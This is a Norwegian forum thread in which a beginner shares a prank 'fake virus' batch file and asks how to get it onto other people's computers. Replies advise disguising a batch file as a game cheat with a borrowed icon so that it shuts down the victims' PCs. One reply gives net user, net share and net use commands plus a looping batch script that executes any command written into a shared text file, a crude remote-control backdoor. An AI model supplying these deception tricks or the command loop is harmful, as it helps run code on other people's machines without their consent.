Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  9 2814
Jeg har begynt å surre litt med diverse cmd koder. Som falske virus og diverse jeg kan sende til andre pc'er. Men så har jeg ikke funnet ut åssen jeg får sendt den videre. Når jeg dobbeltklikker på .BAT fila åpner den seg kun hos meg. Finnes det noen snille/smarte sjeler der ute som kan hjelpe en n00bie?

Hele koden ser slik ut:

@echo off
title VIRUS
cls
color e4
echo Are you sure you wish to erase C:/ drive? (y/n)
pause >-nul
cls
color e4
echo Are you sure you wish to erase C:/ drive? (y/n)
pause >-nul
cls
echo Searching for C: drive...
ping localhost >nul
dir /s
dir /s
echo.
echo.
echo.
echo.
echo Erasing Files...
color 0a
ping localhost >nul
cls
echo Files erased!
pause
msg* You have just been pranked!
exit


Takker så mye på forhånd!
For å kunne sende over msn, så må du pakke den ned til f.eks en .rar fil.
Trådstarter
48 4
Så det går ikke an å sende den over cmd, ved bruk av maskinnavnet?
At det finnes en kode for det, tenkte jeg på.
Nei, du må nok finne ein lur måte å infisere din ofre på.
Tenk om det var nok å trykke ein kode, så vert ei fil sendt og åpna på ein annan pc. Skremmande
Har du maskinen på nettverket ditt, så er det bare å aktivere fildeling på aktuell pc, og føre filen over
Blir tho værre med å åpne filen da....
Det jeg husker at jeg gjorde når jeg holdt på med .Bat filer var at jeg lagde dem i Notepad og lagra de som .bat.
Kalte denne fila for noe jeg visste offeret kom til å like, eks: CS:S-UrgencyHax1.4.

Tror også det gikk ann å bytte ikon, så da bytta jeg dette ikonet til CS:S ikonet.

Deretter sendte jeg det til folk, bare at da slo pc'en de sin seg av istedenfor å vise en falsk virus melding.
NOOOOOOOOOOOOOOOOOO-
robhol's Avatar
Og så det er nevnt: batch er et verktøy, ikke et leketøy (rett og slett fordi det SUGER til jobben) og falske virus er egentlig bare kult hvis man er 11.
Trådstarter
48 4
Ok, takk for svar.

Vel, et sted må man jo begynne, så da får jeg bare være barnslig ;-)
For å kopiere filer fra en pc til en annen så må man ha skrivetilgang.
Hvis du har tilgang til begge maskinene så har jeg en liten metode.

La oss ta "vår" pc senere, nå tar vi "den andre"
Vi kaller "den andre" pc'n for FEST
Først trenger vi en brukerkonto med passord.
[COLOR="Red"]net user Bolle Brus /add[/COLOR] [COLOR="Blue"]-Dette lager en konto som heter Bolle med passord Brus[/COLOR]
[COLOR="#ff0000"]mkdir c:\Test[/COLOR] [COLOR="Blue"]-Mappe vi skal dele[/COLOR]
[COLOR="#ff0000"]net share Test=c:\Test /grant:Bolle,full[/COLOR] [COLOR="#0000ff"]-Vi deler nå mappen med Bolle, som får skrivetilgang[/COLOR]

Over til "vår pc"
[COLOR="#ff0000"]net use \\FEST\Test /USER:FEST\Bolle Brus[/COLOR] [COLOR="#0000ff"]-Vi kobler til den delte mappen med kontoen til Bolle[/COLOR]
Du kan nå behandle den delte mappen som vanlig, men du kan ikke change dir til den.
[COLOR="#ff0000"]dir \\FEST\Test[/COLOR] [COLOR="Blue"]-Eksempel[/COLOR]

Det er alltid en måte å få //FEST til å kjøre .bat-filer.
Husker ikke om det gikk an å bruke CALL eller RUNAS til denne oppgaven.

Men jeg favoriserer en annen metode;
På \\FEST så ville jeg ha lagd en bat som alltid kjører.
Den vil gå i en loop som sjekker en tekstfil, i det eksempelet her Text.txt
Loopen vil bruke en ping som timer.
Denne batfilen vil da se slik ut:
[COLOR="#ff0000"]:Top[/COLOR]
[COLOR="#ff0000"]SET /p _Stuff= <Text.txt[/COLOR] [COLOR="#0000ff"]-Dette henter alt som ligger i tekstfilen[/COLOR]
[COLOR="#ff0000"]%_Stuff%[/COLOR] [COLOR="#0000ff"]-Dette kjører alt som er i tekstfilen[/COLOR]
[COLOR="#ff0000"]DEL c:\Test\Text.txt[/COLOR]
[COLOR="#ff0000"]PING -n 1 1.1.1.1 -w 3000 > NUL[/COLOR] [COLOR="#0000ff"]-"Timer" som kjører loopen hvert 3'e sekund (3000ms)[/COLOR]
[COLOR="#ff0000"]GOTO Top[/COLOR]

Vi kjører denne hos \\FEST på tradisjonell måte, denne skal erstatte en dum admin som gjør alt du sier til ham.

Så, tilbake til "Vår pc" og skrive ting og tang.
[COLOR="#ff0000"]ECHO start mspaint > \\FEST\Test\Text.txt[/COLOR]
Dette vil putte linjen "start mspaint" i Text.txt, som igjen leses av batfilen som kjører hos \\FEST.
Den vil nå kjøre mspaint, og fjerne Text.txt i påvente av ny input.
[COLOR="#ff0000"]ECHO shutdown -s -t 10 > \\FEST\Test\Text.txt[/COLOR] [COLOR="#0000ff"]-Slår av maskinen etter 10 sekunder[/COLOR]
[COLOR="#ff0000"]ECHO start iexplore.exe www.youtube.com > \\FEST\Test\Text.txt[/COLOR] [COLOR="#0000ff"]-Starter Internet Explorer med youtube[/COLOR]
Ja, nå kan du gjøre hva du vil.
Sist endret av Rolsen Royce; 1. februar 2010 kl. 23:56.
/\
'|'

Haha, Genialt!
Hadde jeg aldri kommet på av meg selv ^^

Men.. gogo [COLOR="Red"]Metasploit[/COLOR]